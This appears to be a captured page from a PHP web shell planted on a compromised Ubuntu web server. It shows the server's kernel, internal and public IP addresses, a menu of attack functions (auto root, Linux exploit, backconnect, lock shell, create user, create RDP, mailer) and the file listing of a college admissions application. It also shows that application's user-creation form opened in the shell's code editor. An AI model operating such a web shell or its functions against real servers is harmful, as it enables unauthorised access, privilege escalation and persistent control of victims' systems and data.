Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 13.59.236.101
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
admission /
html_modules /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
AgentMainPage.html
7.01
KB
-rw-r--r--
MainPage.html
4.87
KB
-rw-r--r--
agentDetScr.html
455
B
-rwxr-xr-x
agentRegApp.html
440
B
-rwxr-xr-x
agentStdScr.html
454
B
-rwxr-xr-x
agentUrlScr.html
1.8
KB
-rwxr-xr-x
appDet.html
14.13
KB
-rw-r--r--
applicationDet.html
4.63
KB
-rwxr-xr-x
changePassword.html
1.21
KB
-rw-rw-r--
collSMS.html
4.58
KB
-rwxr-xr-x
collnotification.html
2.65
KB
-rwxr-xr-x
comDet.html
14.35
KB
-rw-r--r--
createAgent.html
3.67
KB
-rw-r--r--
createuser.html
3.98
KB
-rw-rw-r--
dailyUpdates.html
5.64
KB
-rwxr-xr-x
dashboard.html
11.87
KB
-rw-r--r--
datatable.html
13.82
KB
-rwxr-xr-x
examAttendance.html
3.02
KB
-rwxr-xr-x
examCntr.html
2.98
KB
-rwxr-xr-x
feeDetails.html
474
B
-rw-r--r--
generatebonfdata.html
3.65
KB
-rw-r--r--
get_univ_details.html
7.54
KB
-rw-r--r--
impfiles.html
1.61
KB
-rw-r--r--
leadDet.html
689
B
-rw-rw-r--
leadScrDet.html
6.56
KB
-rwxr-xr-x
leadStdDet.html
15.24
KB
-rw-r--r--
leads.html
2.42
KB
-rw-r--r--
masterScr.html
4.59
KB
-rwxr-xr-x
oasislinks.html
1.38
KB
-rwxr-xr-x
paymentDetails.html
222
B
-rw-rw-r--
paymentStatus.html
1.39
KB
-rwxr-xr-x
paymetDetailScr.html
4.49
KB
-rwxr-xr-x
personal.html
16
KB
-rw-r--r--
qpIndent.html
2
KB
-rwxr-xr-x
registered.html
7.76
KB
-rw-r--r--
reports.html
2.29
KB
-rwxr-xr-x
ruaspush.html
3.12
KB
-rwxr-xr-x
rvrtReport.html
2.97
KB
-rwxr-xr-x
scriptStatusUpload.html
1.99
KB
-rwxr-xr-x
scriptStatusView.html
1.86
KB
-rwxr-xr-x
sendSMSExcel.html
4.18
KB
-rwxr-xr-x
setExamTimetable.html
2.28
KB
-rwxr-xr-x
sspData.html
2.33
KB
-rwxr-xr-x
std_dashboard.html
1.22
KB
-rw-r--r--
stdchangePassword.html
1.22
KB
-rw-r--r--
stddashboard.html
270
B
-rw-r--r--
student.html
6.35
KB
-rwxr-xr-x
student_reg_remove.html
1.52
KB
-rwxr-xr-x
testData.html
9.11
KB
-rw-r--r--
testscr.html
4.51
KB
-rw-r--r--
timetableUpload.html
2.52
KB
-rwxr-xr-x
univRefundReport.html
2.47
KB
-rwxr-xr-x
updatedegdet.html
2.25
KB
-rw-r--r--
updclgdet.html
2.21
KB
-rw-r--r--
uploadsspdata.html
2.29
KB
-rw-r--r--
uploadsspdata_bonf.html
2.41
KB
-rw-r--r--
uploadsspdata_res.html
3.61
KB
-rw-r--r--
userDetScr.html
469
B
-rwxr-xr-x
userDetailScr.html
4.49
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : createuser.html
<link rel="stylesheet" href="../select2/css/select2.min.css" /> <script src="../select2/js/select2.full.min.js"></script> <div class="card"> <div class="card-header d-flex justify-content-between""> <div class="header1" style="cursor: default"> <b>Create User</b> </div> <div class="header2"> <button class="btn btn-danger" onclick="getDashboard()"> Back </button> <button class="btn btn-success" onclick="viewCreateDet()" > View </button> </div> </div> <div class="card-body"> <div class="col-sm-12"> <div class="row mb-2"> <div class="col-sm-4"> <label for="fullname"> <b> Full Name </b></label> <input type="text" id="fullname" class="form-control" placeholder="FullName" value="" /> </div> <div class="col-sm-4"> <label for="emailid"> <b> Email ID </b></label> <input type="email" inputmode="email" class="form-control" id="emailid" placeholder="Email Id" value="" /> </div> <div class="col-sm-4"> <label for="mobileno"> <b>Mobile Number </b></label> <input type="text" id="mobileno" inputmode="numeric" class="form-control" placeholder="Mobile" value="" /> </div> </div> <div class="row mb-2"> <div class="col-sm-4"> <label for="password"> <b> Password </b></label> <input type="password" id="password" class="form-control" placeholder="Password" value="" /> </div> <div class="col-sm-4"> <label for="confirmpassword"> <b>Confirm Password </b></label> <input type="text" id="confirmpassword" class="form-control" placeholder="Confirm Password" value="" /> </div> <div class="col-sm-4"> <label for="mobileno"> <b>User Type </b></label> <select class="form-control select-text" id="fusertyp" > </select> </div> </div> <div class="row mb-2"> <div class="col-sm-4"> <label for="fusercoll"><b>College</b></label> <select id="fusercoll" multiple class="form-control select2" style="width: 100%;"></select> </div> <div class="col-sm-4"> <label for="fuserdeg"><b>Degree</b></label> <select id="fuserdeg" multiple class="form-control select2" style="width: 100%;"></select> </div> <input id="fsavetype" hidden/> <div class="col-sm-4"> <label></label> <button class="btn btn-primary" onclick="saveCreateUser()" style="width: 20%;margin-top: 7%;"> Save </button> </div> </div> <!-- <div class="row mb-2"> <div class="col-sm-4"> <label for="flabname" id="flabtitle"><b>College</b></label> <select id="fusercoll" multiple class="form-control select2 p-0" data-live-search="true" style="width: 300px" ></select> </div> <div class="col-sm-4"> <label for="flabname" id="flabtitle"><b>Degree</b></label> <select id="fuserdeg" multiple class="form-control select2 p-0" data-live-search="true" style="width: 300px" ></select> </div> <input id="fsavetype" hidden/> </div> --> <!-- <div class="row"> <div class="col-sm-4"> <button class="btn btn-primary" onclick="saveCreateUser()"> Save </button> </div> </div> --> </div> </div> </div> <script> $(".select2").select2(); </script>
Close